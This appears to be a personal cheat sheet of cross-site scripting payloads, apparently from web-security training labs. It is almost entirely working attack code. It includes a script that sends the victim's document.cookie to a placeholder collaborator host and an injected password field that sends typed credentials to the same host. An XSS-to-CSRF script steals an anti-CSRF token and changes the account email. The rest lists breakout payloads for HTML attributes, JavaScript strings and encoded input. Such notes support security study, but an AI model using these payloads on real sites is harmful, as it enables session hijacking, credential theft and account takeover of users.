#Exploiting cross-site scripting to steal cookies: 
<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

#Exploiting cross-site scripting to capture passwords
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

#Exploiting XSS to perform CSRF
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

*************************************************************************

    <script>alert(document.domain)</script>
    <img src=1 onerror=alert(1)>
    <script>onerror=alert;throw 1337</script>
    <script>{onerror=alert}throw 1337</script>
    onerror=alert;throw 1
    ${alert(document.domain)}
    


*************************************************************************


#XSS in html tag attributes
      "><script>alert(document.domain)</script>
      " autofocus onfocus=alert(document.domain) x="
      "onmousealert"=alert(1)
      <a href="javascript:alert(document.domain)">

#XSS into javascript

 		<script>
		var input = 'controllable data here';			=     </script><img src=1 onerror=alert(document.domain)>
		</script>
 
   *Breaking out javascript strings
        '-alert(document.domain)-'
		';alert(document.domain)//

	* HTML-encoding
	 	http://foo?&apos;-alert(1)-&apos;